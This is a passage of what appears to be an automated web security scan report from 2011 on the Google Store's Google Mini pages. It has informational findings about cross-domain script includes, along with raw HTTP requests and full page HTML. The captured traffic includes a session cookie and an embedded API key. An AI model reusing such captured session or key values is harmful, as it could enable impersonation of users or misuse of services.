<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '15176';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';
ga.special = 'on sale';

ga.isNew = 'no';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

4.2. http://www.googlestore.com/Mini/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/Mini/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /Mini/ HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/Wearables/Organic+Black+is+Back+T-Shirt.axd
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.14.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21775
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:00:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Mini</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<style type="text/css">
.search_top
{
    font-size:15px;
    margin-bottom:15px;
}
.search_top select{ font-size:13px;}
</style>

<div class="search_top">

<form action="/googlesearch.aspx" id="search" method="get">
<b>Search:</b>
<select name="category">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="doodles" >Doodles</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" autocomplete="off" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

</div>

<div id="category-head">
<h1>
Mini
</h1>

<div id="sort-inline">
<form action="" method="get">

        <a href="?viewall=true">View All</a>     |   

        <b>Sort by:</b>     
            <select name="SortBy" class="pagenum-nav" onchange="window.location.href=this.options[this.selectedIndex].value">

            <option value="/Mini/?order_by=Price&sort_order=Desc">Price(high to low)</option>

            <option value="/Mini/?order_by=Price&sort_order=Asc" selected="selected">Price(low to high)</option>

            </select>
            </form>
</div>

<div id="top_paging">
<div id="breadcrumbs">

<a href="http://www.googlestore.com/shop.axd/Home">Home</a> <span>/</span>

<a href="/Mini/">Mini</a>
</div>
<div class="paging_top">

<div class="pagenav">Page 1 of 1

</div>

</div>
</div>
</div>

<div id="productlist">
<a href="/Specials/"><img border="0" src='/content/BannerImages/youtubesalebanner.jpg' alt=''></a>

<table border="0" cellpadding="10" cellspacing="15" class="productTable">

    <tr>

<td class="txtA" style="width:33%; vertical-align:top">
<div style="position:relative">

<a href="/Mini/Google+Mini+2+0+300K+-+2+YR.axd"><img src="/content/images/thumb/miniimageb.jpg" alt="Google Mini 2.0 300K - 2 YR" style="border:0; width:100px; height:100px" /></a>

<br style="clear:both" />
<a href="/Mini/Google+Mini+2+0+300K+-+2+YR.axd">Google Mini 2.0 300K - 2 YR</a>

<br /><b>Price: </b>$9,990.00


</div>
</td>

<td class="txtA" style="width:33%; vertical-align:top">
<div style="position:relative">

<a href="/Mini/Google+Mini+2+0+50K+-+2+YR.axd"><img src="/content/images/thumb/miniimageb.jpg" alt="Google Mini 2.0 50K - 2 YR" style="border:0; width:100px; height:100px" /></a>

<br style="clear:both" />
<a href="/Mini/Google+Mini+2+0+50K+-+2+YR.axd">Google Mini 2.0 50K - 2 YR</a>

<br /><b>Price: </b>$2,990.00


</div>
</td>

<td class="txtA" style="width:33%; vertical-align:top">
<div style="position:relative">

<a href="/Mini/Google+Mini+2+0+100K+-+2+YR.axd"><img src="/content/images/thumb/miniimageb.jpg" alt="Google Mini 2.0 100K - 2 YR" style="border:0; width:100px; height:100px" /></a>

<br style="clear:both" />
<a href="/Mini/Google+Mini+2+0+100K+-+2+YR.axd">Google Mini 2.0 100K - 2 YR</a>

<br /><b>Price: </b>$3,990.00


</div>
</td>
</tr>
    <tr>

<td class="txtA" style="width:33%; vertical-align:top">
<div style="position:relative">

<a href="/Mini/Google+Mini+2+0+200K+-+2+YR.axd"><img src="/content/images/thumb/miniimageb.jpg" alt="Google Mini 2.0 200K - 2 YR" style="border:0; width:100px; height:100px" /></a>

<br style="clear:both" />
<a href="/Mini/Google+Mini+2+0+200K+-+2+YR.axd">Google Mini 2.0 200K - 2 YR</a>

<br /><b>Price: </b>$6,990.00


</div>
</td>

   <td width="33%"> </td>

   <td width="33%"> </td>

</tr>
</table>

</div>
<div class="paging_bottom">

<div class="pagenav">Page 1 of 1

</div>

</div>

</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShUZW1wbGF0ZSRjdGxSaWdodE5hdiRjdGxTaWdudXAkYnRuU2lnblVw" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwL5t4CVDgKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<br />
<div id="box-round">
<div class="top"><span><h2 class="side_head">Search Filters</h2></span></div>
<div class="center-content">

<div id="searchfilters">

<b>Shop by category:</b><br />
<select name="filter3" onchange="jumpURL()">
       <option value="">Select a Category..</option>
       <option value="/shop.axd/Search?c0.cat=447">Wearables [89]</option><option value="/shop.axd/Search?c0.cat=454">Eco [74]</option><option value="/shop.axd/Search?c0.cat=444">Accessories [62]</option><option value="/shop.axd/Search?c0.cat=448">You Tube [56]</option><option value="/shop.axd/Search?c0.cat=446">Office [29]</option><option value="/shop.axd/Search?c0.cat=445">Kids [23]</option><option value="/shop.axd/Search?c0.cat=453">New [14]</option><option value="/shop.axd/Search?c0.cat=506">Apps [13]</option><option value="/shop.axd/Search?c0.cat=441">Fun [13]</option><option value="/shop.axd/Search?c0.cat=456">TopSellers [10]</option><option value="/shop.axd/Search?c0.cat=455">Specials [7]</option></select><br/><b>Shop By Size:</b><br />
       <select name="filter1" onchange="jumpURL()">
               <option value="">Select a Size..</option>

       <option value="/shop.axd/Search?f.size=M">M [93]</option><option value="/shop.axd/Search?f.size=L">L [91]</option><option value="/shop.axd/Search?f.size=S">S [90]</option><option value="/shop.axd/Search?f.size=XL">XL [83]</option><option value="/shop.axd/Search?f.size=2XL">2XL [75]</option><option value="/shop.axd/Search?f.size=XS">XS [11]</option><option value="/shop.axd/Search?f.size=2T">2T [8]</option><option value="/shop.axd/Search?f.size=3XL">3XL [8]</option><option value="/shop.axd/Search?f.size=4T">4T [8]</option><option value="/shop.axd/Search?f.size=3T">3T [7]</option><option value="/shop.axd/Search?f.size=6+MONTHS">6 MONTHS [4]</option><option value="/shop.axd/Search?f.size=12+MONTH">12 MONTH [2]</option><option value="/shop.axd/Search?f.size=12+MONTHS">12 MONTHS [2]</option><option value="/shop.axd/Search?f.size=5T">5T [2]</option><option value="/shop.axd/Search?f.size=LT">LT [2]</option><option value="/shop.axd/Search?f.size=XLT">XLT [2]</option><option value="/shop.axd/Search?f.size=18+MONTH">18 MONTH [1]</option><option value="/shop.axd/Search?f.size=18+MONTHS">18 MONTHS [1]</option><option value="/shop.axd/Search?f.size=24+MONTHS">24 MONTHS [1]</option><option value="/shop.axd/Search?f.size=3+MONTHS">3 MONTHS [1]</option><option value="/shop.axd/Search?f.size=5%2f6">5/6 [1]</option></select><br/><b>Shop by price:</b><br />
       <select name="filter2" onchange="jumpURL()">
               <option value="">Select a Price..</option>

       <option value="/shop.axd/Search?q.price=From+%240+to+%2410">From $0 to $10 [103]</option><option value="/shop.axd/Search?q.price=From+%2410+to+%2420">From $10 to $20 [81]</option><option value="/shop.axd/Search?q.price=From+%2420+to+%2440">From $20 to $40 [53]</option><option value="/shop.axd/Search?q.price=From+%2440+to+%24100">From $40 to $100 [43]</option><option value="/shop.axd/Search?q.price=From+%24100+and+up">From $100 and up [19]</option></select>
</div>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';

ga.isNew = 'no';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

4.3. http://www.googlestore.com/Mini/Google+Mini+2+0+300K+-+2+YR.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/Mini/Google+Mini+2+0+300K+-+2+YR.axd

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /Mini/Google+Mini+2+0+300K+-+2+YR.axd HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/Mini/
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.39.9.1319224888597; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50775
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:22:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Google Mini 2.0 300K - 2 YR</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<script type="text/javascript" src="/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="/js/addtl.js"></script>
<link rel="stylesheet" href="/css/popup.css" />

<style type="text/css">
.search_top
{
    font-size:15px;
    margin-bottom:15px;
}
.search_top select{ font-size:13px;}
</style>

<div class="search_top">

<form action="/googlesearch.aspx" id="search" method="get">
<b>Search:</b>
<select name="category">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="doodles" >Doodles</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" autocomplete="off" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

</div>
<div id="product">

<h1>Mini</h1>

<div id="breadcrumbs_only">

<a href="http://www.googlestore.com/shop.axd/Home">Home</a> <span>/</span>

<a href="/Mini/">Mini</a>
</div>
   <div id="product_info">

<style type="text/css">
#terms{ width:100%; height:250px; overflow:scroll; border:1px solid #CCC; padding:3px;}
</style>

<script language="javascript" src="/js/style.js"></script>
<script lang="javascript">

function addToWishList(frmName)
{
   var frm = document.forms[frmName];
   frm.action = '/shop.axd/AddToWishList';
   frm.submit();
}

</script>
<form action="/shop.axd/AddToCartBP" method="post" id="postForm" name="frmProductDetails">
<input type="hidden" name="type" value="K">

<input type="hidden" name="cid" value="651">

<input type="hidden" name="item_no" value="10 65109">

<input type="hidden" name="edp_no" value="10412">

<input type="hidden" name="keywords" value="">
<input type="hidden" name="page_no" value="">

<table border="0" cellpadding="0" cellspacing="0" width="100%">

   <tr valign="top">
       <td width=200 valign=top style="padding:10px">
<div id="product-image-wrap">
<a id="ProductImageHref" onclick="click('Enlarge Image')" style="text-decoration:none;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fminiimage.jpg&edp_no=10412',420,600)">
<img id="ProductImage" width="225px" src="/content/images/standard/miniimagea.jpg" alt="" />
</a>

<div style="position:relative; overflow:hidden; width:215px">
<a style="float:left;" onclick="click('Enlarge Image')" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2fminiimage.jpg&edp_no=10412',420,600)" class="enlarge">Enlarge image</a>

</div>
</div>

<script type="text/javascript">

var mainSrc = $("#ProductImage").attr("src");
$("#multiple li a").bind("mouseenter", function(e){
$(this).css("border","1px solid #eee");
var ssrc = $(this).children("img").attr("src");
var inum = $(this).children("img").attr("id");
var medSrc = $("#i" + inum).attr("src");
if(medSrc == undefined){
medSrc = ssrc.replace("C.jpg","A.jpg");
}
$("#ProductImage").attr("src",medSrc);

});

$("#multiple li a").bind("mouseleave", function(e){
$(this).css("border","1px solid #FFF");
});

$("#multiple").bind("mouseleave", function(e){
$("#ProductImage").attr("src","/content/images/standard/miniimagea.jpg");
});
</script>

</td>
       <td valign=top style="padding:10px" class="product_details">
       <h2>Google Mini 2.0 300K - 2 YR</h2>
               <b>Item #:</b> 10 65109
<br />
       <br />

<p>The same reliable results you expect from Google web search can be yours on your corporate network or public website with the Google Mini search appliance. This combined hardware and software solution is easy to use, simple to deploy, and can begin providing relevant and secure search results in just a few short hours. The Google Mini can search up to 300,000 documents in 220 different file types and supports document-level security so that users only see the content they're authorized to view. And the Mini's new OneBox for Enterprise feature enables users to view search results from a variety of business applications in a single Google interface. All customers can upgrade the document count on the same Google Mini (up to 300,000 documents) by paying the price difference between the document counts at anytime via the customer support site. 
